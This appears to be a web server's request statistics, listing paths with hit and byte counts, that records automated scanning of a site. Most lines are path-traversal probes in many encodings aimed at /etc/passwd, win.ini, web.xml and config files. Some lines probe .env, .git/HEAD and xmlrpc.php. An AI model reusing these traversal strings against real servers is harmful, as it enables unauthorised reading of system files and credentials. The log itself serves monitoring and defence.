/acc/index.php/install/wizard/locale/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini 3 168348 0 0
/acc/index.php/install/wizard/config/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini 1 5311 0 0
/acc/index.php/install/wizard/config/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini 1 5312 0 0
/acc/index.php/install/wizard/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/zm7j091mkyee.php 1 56116 0 0
/acc/index.php/install/wizard/config/../../../package-lock.json 1 5283 0 0
/acc/index.php/install/wizard/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/config/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 3 15873 0 0
/acc/index.php/install/wizard/locale/../package-lock.json 1 56116 0 0
/acc/index.php/install/wizard/locale/..../..../..../..../..../..../..../..../etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/%C0%AE%C0%AE/WEB-INF/web.xml 1 16599 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd 1 5371 0 0
//shop/wp-includes/wlwmanifest.xml 7 267973 0 0
/acc/index.php/install/wizard/locale/%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%afetc%c0%af%c0%af%c0%afpasswd 1 56116 0 0
/acc/index.php/install/wizard/config/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd 1 5307 0 0
/acc/index.php/install/wizard/config/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/windows/win.ini 1 5344 0 0
/acc/index.php/install/wizard/locale/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini 3 15885 0 0
/acc/index.php/install/wizard/locale/../../../Gemfile 1 56116 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/%C0%AE%C0%AE/WEB-INF/web.xml 1 56116 0 0
/acc/index.php/install/wizard/locale/../../WEB-INF/web.xml 1 56116 0 0
/acc/index.php/install/wizard/config/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc/passwd 1 5411 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/../../../../Gemfile 1 56116 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd 1 56116 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\etc/passwd 1 5307 0 0
/acc/index.php/install/wizard/locale/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/../../../Gemfile 1 5273 0 0
/acc/index.php/install/wizard/config/../../../../package.json 1 5268 0 0
/acc/index.php/install/wizard/config/..../..../..../..../..../..../..../..../etc/passwd 1 5262 0 0
/acc/index.php/install/wizard/locale/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/zm7j091mkyee.jsp 1 56116 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd 1 56116 0 0
/.git/HEAD 2 76516 2 2
/acc/index.php/install/wizard/config 1 5262 0 0
/acc/index.php/install/wizard/config/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 5323 0 0
/acc/index.php/install/wizard/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\/etc/passwd 1 56116 0 0
//xmlrpc.php 7 267847 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd 1 16599 0 0
/acc/index.php/install/wizard/locale/\\../\\../\\../\\../\\../\\../\\../\\../etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\boot.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd 1 5355 0 0
/acc/index.php/install/wizard/config/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 5331 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 5279 0 0
/acc/index.php/install/wizard/locale/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini 1 5343 0 0
/acc/index.php/install/wizard/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/.../.../.../.../.../.../.../.../etc/passwd 1 5275 0 0
/acc/index.php/install/wizard/config/../web.config 1 5276 0 0
/acc/index.php/install/wizard/locale/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc/passwd 1 56116 0 0
/acc/index.php/install/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 56116 0 0
/acc/index.php/install/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\boot.ini 1 16599 0 0
//wp-includes/wlwmanifest.xml 7 267938 0 0
//news/wp-includes/wlwmanifest.xml 7 267973 0 0
/acc/index.php/install/wizard/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/index/1'\"1000 1 5280 0 0
/acc/index.php/install/wizard/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd 2 33198 0 0
/acc/index.php/install/wizard/index/1'\"1000 1 16599 0 0
/acc/index.php/install/wizard/.../.../.../.../.../.../.../.../windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\/etc/passwd 1 5355 0 0
/acc/index.php/install/wizard/./WEB-INF/web.xml%C0%80.jsp 1 16599 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/windows/win.ini 1 5328 0 0
/acc/index.php/install/wizard/config/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd 1 5307 0 0
/acc/index.php/install/wizard/config/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\windows/win.ini 1 5277 0 0
/acc/index.php/install/wizard/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd 1 5339 0 0
/acc/index.php/install/wizard/locale/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/config/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd 2 10838 0 0
/acc/install/wizard/locale/ 1 56116 0 0
/acc/index.php/install/wizard/locale/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 16599 0 0
/acc/index.php/install/wizard/locale/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini 1 56116 0 0
/acc/index.php/install/wizard/config/../package.json 1 5278 0 0
/acc/index.php/install/wizard/locale/\\../\\../\\../\\../\\../\\../\\../\\../windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/./WEB-INF/web.xml 1 56116 0 0
/acc/index.php/install/wizard/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/config/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/etc/passwd 1 5286 0 0
/acc/index.php/install/wizard/config/../../WEB-INF/web.xml%C0%80.jsp 1 5277 0 0
/acc/index.php/install/wizard/locale/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 56116 0 0
/acc/index.php/install/wizard/locale/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 16599 0 0
/.env 12 147467 7 1
/acc/index.php/install/wizard/locale/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd 1 16599 0 0
/wp-content/ 11 135181 0 6
/acc/index.php/install/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/../../../package-lock.json 1 56116 0 0
/acc/index.php/install/wizard/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd 1 16599 0 0
/acc/index.php/install/wizard/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\boot.ini 1 16599 0 0
/acc/index.php/install/wizard/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/../../../WEB-INF/web.xml%C0%80.jsp 1 16599 0 0
/acc/index.php/install/wizard/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini 3 49797 0 0
/acc/index.php/install/wizard/locale/..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini 2 112232 0 0
/acc/index.php/install/wizard/config/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd 1 5279 0 0
/acc/index.php/install/wizard/locale/.../.../.../.../.../.../.../.../windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini 1 5289 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd 1 5335 0 0
/acc/index.php/install/wizard/locale/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\/etc/passwd 1 5387 0 0
/acc/index.php/install/wizard/config/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd 1 5339 0 0
/acc/index.php/install/wizard/config/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows/win.ini 1 5415 0 0
/acc/index.php/install/wizard/config/0s6wgrsclhsg.php 1 5262 0 0
/acc/index.php/install/wizard/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\/etc/passwd 1 16599 0 0
/catalog-portal/ui/oauth/verify 1 12393 1 1
/acc/index.php/install/wizard/locale/../WEB-INF/web.xml%C0%80.jsp 1 56116 0 0
//wp2/wp-includes/wlwmanifest.xml 7 267966 0 0
/acc/index.php/install/wizard/config/..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini 2 10590 0 0
/acc/index.php/install/wizard 1 16599 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 5323 0 0
/acc/index.php/install/wizard/locale/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/../../Gemfile 1 56116 0 0
//blog/wp-includes/wlwmanifest.xml 7 267973 0 0
/acc/index.php/install/wizard/config/../../web.config 1 5268 0 0
/acc/index.php/install/wizard/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd 1 16599 0 0
/acc/js/prototype/windows/MIT-LICENSE 380 418000 0 0
/acc/index.php/install/wizard/locale/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd 1 56116 0 0
/cgi-sys/defaultwebpage.cgi 1 7081 0 0
/acc/index.php/install/wizard/config/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd 1 5339 0 0
/acc/index.php/install/wizard/locale/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini 1 56116 0 0
/acc/index.php/install/wizard/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 16599 0 0
/acc/index.php/install/wizard/config/../../../web.config 1 5276 0 0
/acc/index.php/install/wizard/config/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/win.ini 1 5312 0 0
/acc/index.php/install/wizard/config/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini 1 5312 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/config/../../../../web.config 1 5268 0 0
/acc/index.php/install/wizard/locale/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd 2 112232 0 0
/acc/index.php/install/wizard/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/../../../package.json 1 56116 0 0
/acc/index.php/install/wizard/locale/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd 2 112232 0 0
